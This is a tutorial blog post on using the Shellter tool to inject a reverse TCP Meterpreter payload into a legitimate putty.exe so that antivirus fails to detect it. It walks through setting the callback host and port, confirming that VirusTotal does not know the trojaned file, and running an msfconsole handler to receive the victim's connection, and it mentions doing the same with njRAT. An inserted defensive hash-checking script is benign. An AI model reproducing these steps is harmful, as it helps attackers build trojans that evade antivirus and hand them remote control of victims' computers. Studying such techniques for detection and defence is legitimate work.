Shellter Project – bypassing Antivirus Detection
Shellter is found at the website www.shellterproject.com and is a shellcode injector. I have been using the tool to demonstrate to customers how simple it is to bypass antivirus (AV) detection using programs that would otherwise have been flagged as suspicious or as possible threats by typical AV analysis engines.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills. We only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.
The Install
To install Shellter on Kali Linux use the following commands:
apt-get update
apt-get install shellter
Time to Mess Around a Little
Next, we are going to take a legitimate program, like putty.exe, and use it for our test bed. In reality we could use literally any legitimate Windows executable.
You can easily use some slightly more advanced techniques to embed similar types of attacks in other types of files. For now let’s simply stick with Windows program executables for this example.
As you can see in the screenshot, the legitimate executable has been transferred into our working directory in Kali. When you play with Shellter, make sure your carrier (the legitimate executable) is in the same directory when you run Shellter.
Now we will run Shellter:
For the sake of simplicity and expediency, we will keep to the basics for now.
Let’s select Auto for the mode. We will also specify the legitimate program. Shellter will create a backup of the legitimate executable and then modify it.
The code is modified at this point. Shellter gives us the option to use one of the available payloads, or we can supply a custom one. We are going to choose reverse TCP, which is one of the listed options:
NOTE: If you need the legitimate executable intact after this, it is best to create a backup on a separate storage device before you start.
You will be asked to further define some other options:
LHOST
This is the IP address or DNS name the victim machine will use to connect back to the command and control server. The server has to be reachable from the victim.
LPORT
This is the port on which the command and control server listens for the victim’s connection. In our example we used port 443.
Congratulations.
At this point you have created your new malicious program, which will most likely go undetected by most antivirus programs. If you get a verified message (see below), you are basically good to go.
Now we can see that putty.exe has been modified, and Shellter created a backup of the original executable.
We will now compute the file’s hash with the md5sum command and check that hash against VirusTotal:
We can see VirusTotal did not have this file:
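As an added example (not part of the original post), here is the defender’s side of the md5sum step above: a small Python integrity check that records the MD5 and SHA-256 of a trusted copy of a binary and flags any file whose digests differ, which is how a modified carrier such as the altered putty.exe stands out next to its backup. The file contents and paths below are constructed stand-ins, not real binaries.

```python
import hashlib
import os
import tempfile

def digests_of_bytes(data):
    """Return (md5, sha256) hex digests of an in-memory byte string."""
    return hashlib.md5(data).hexdigest(), hashlib.sha256(data).hexdigest()

def file_digests(path, chunk_size=65536):
    """Return (md5, sha256) hex digests of a file, hashing it in chunks."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()

def verify_against_baseline(path, baseline):
    """Compare a file with a trusted baseline {"md5": ..., "sha256": ...}.

    Both digests must match; checking MD5 alone would leave the weaker
    algorithm as the only line of defence.
    """
    md5, sha256 = file_digests(path)
    return {"path": path, "md5": md5, "sha256": sha256,
            "intact": md5 == baseline["md5"] and sha256 == baseline["sha256"]}

def demo():
    """Constructed stand-ins: a pristine 'putty.exe.bak' and an altered 'putty.exe'.

    The content is fake (not a real PE); only the fact that it changed matters.
    Returns (intact verdict for the backup, intact verdict for the modified file).
    """
    original = b"MZ" + b"\x00" * 62 + b"constructed stand-in for the vendor binary"
    modified = original[:40] + b"injected stub (constructed)" + original[40:]
    with tempfile.TemporaryDirectory() as tmp:
        backup_path = os.path.join(tmp, "putty.exe.bak")
        target_path = os.path.join(tmp, "putty.exe")
        with open(backup_path, "wb") as fh:
            fh.write(original)
        with open(target_path, "wb") as fh:
            fh.write(modified)
        # A real baseline comes from a trusted source (vendor-published hash or a
        # digest recorded before deployment); here it is taken from the backup copy.
        baseline = dict(zip(("md5", "sha256"), file_digests(backup_path)))
        return (verify_against_baseline(backup_path, baseline)["intact"],
                verify_against_baseline(target_path, baseline)["intact"])

if __name__ == "__main__":
    print(demo())  # (True, False)
```

A hash that VirusTotal has never seen says nothing about whether the file is clean; a mismatch against a known-good baseline is the signal worth acting on.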
We start our listening server in msfconsole on Kali Linux:
msfconsole
use exploit/multi/handler
set LHOST 192.168.81.175
set LPORT 443
set PAYLOAD windows/meterpreter/reverse_tcp
show options
exploit
Now we will go to our victim machine, where we have transferred the modified version of our executable. We should have bypassed most antivirus systems at this point.
We will launch our exploited program which will connect back to our command and control server.
Using this method I was able to bypass many leading antivirus systems. I tried the same type of attack by taking malware from well-known existing bots. I basically created a backdoor program that would infect a victim with njRAT and connect it back to my command and control server.
Source: codingsec.net